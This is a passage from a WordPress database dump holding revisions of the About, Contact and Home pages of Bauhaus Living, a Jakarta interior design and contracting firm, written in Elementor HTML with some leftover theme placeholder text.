Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Let\'s turn your ideas\ninto reality</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Commercial						</h4>\n					0\n				    			        						<h4>\n							Residential						</h4>\n					0\n				    			        						<h4>\n							Office						</h4>','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 09:52:23','2023-09-22 09:52:23','',38,'https://bauhaus.futuremediatrix.com/?p=4906',0,'revision','',0),(4907,3,'2023-09-22 09:52:23','2023-09-22 09:52:23','<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/file-1.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p> </p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Let\'s turn your ideas\ninto reality</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Commercial						</h4>\n					0\n				    			        						<h4>\n							Residential						</h4>\n					0\n				    			        						<h4>\n							Office						</h4>','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 09:52:23','2023-09-22 09:52:23','',38,'https://bauhaus.futuremediatrix.com/?p=4907',0,'revision','',0),(4908,3,'2023-09-22 09:57:12','2023-09-22 09:57:12','<h3>contact us</h3>\n														<h2>\n								Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!							</h2>\n							<p> Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:57:12','2023-09-22 09:57:12','',40,'https://bauhaus.futuremediatrix.com/?p=4908',0,'revision','',0),(4909,3,'2023-09-22 09:57:12','2023-09-22 09:57:12','<h3>contact us</h3>\n														<h2>\n								Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!							</h2>\n							<p> Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:57:12','2023-09-22 09:57:12','',40,'https://bauhaus.futuremediatrix.com/?p=4909',0,'revision','',0),(4910,3,'2023-09-22 09:57:12','2023-09-22 09:57:12','Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							<h3>contact us</h3>\n														<h2>\n								Saatnya Impian Anda Menjadi Kenyataan!							</h2>\n							<p> Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini untuk konsultasi gratis dan mulailah perjalanan menuju interior yang menginspirasi! </p>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:57:12','2023-09-22 09:57:12','',40,'https://bauhaus.futuremediatrix.com/?p=4910',0,'revision','',0),(4911,3,'2023-09-22 09:58:13','2023-09-22 09:58:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:58:13','2023-09-22 09:58:13','',22,'https://bauhaus.futuremediatrix.com/?p=4911',0,'revision','',0),(4912,3,'2023-09-22 09:58:13','2023-09-22 09:58:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai 